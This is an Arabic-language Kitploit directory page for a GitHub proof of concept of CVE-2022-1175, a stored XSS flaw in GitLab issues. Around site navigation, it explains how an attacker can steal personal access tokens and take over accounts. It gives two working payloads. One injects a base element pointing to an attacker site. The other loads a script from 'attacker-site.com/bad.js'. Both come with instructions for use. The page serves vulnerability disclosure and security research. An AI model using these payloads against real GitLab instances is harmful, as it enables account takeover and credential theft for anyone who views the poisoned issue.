Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-1175 | Kitploit
أدوات/GitHubGitHub/greenwolf/cve-2022-1175
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubgreenwolf/cve-2022-1175

CVE-2022-1175

عرض المستودع
11منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-1175

ثغرة XSS مخزّنة في Gitlab، يمكن تعيينها في مشكلة (Issue) على مشروع، سواء كان مشروعك الخاص أو مشروع مستخدم آخر. تتيح هجمات مثل إنشاء وسرقة رمز الوصول الشخصي (PAT) لأي شخص يزور المشكلة. ويمكن لرموز PAT بعد ذلك توفير وصول كامل إلى Gitlab API بهوية ذلك المستخدم، وهو ما يعادل الاستيلاء الكامل على الحساب.

يمكن استغلالها بتغيير عنصر base للمشروع إلى موقعك، بحيث يتم جلب السكربتات من موقعك. غيّر JavaScript على موقعك ليطابق أسماء السكربتات المستدعاة في الصفحة. ومع ذلك، قد يكسر هذا عناصر في الصفحة.

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><base href=http://unsafe-website.com/><pre x=&#34;"><code></code></pre>

تضمين السكربت القياسي يعمل أيضًا اعتمادًا على سياسة CSP للموقع. وهذا أسلوب أكثر تمويهًا.

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><script src="https://attacker-site.com/bad.js"></script><pre x=&#34;"><code></code></pre>

أدرج مطورو GitLab سلسلة XSS الكاملة في الكود بشكل ملائم، ويمكن العثور عليها هنا:

https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4

المرجع:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175

تنزيل الأداة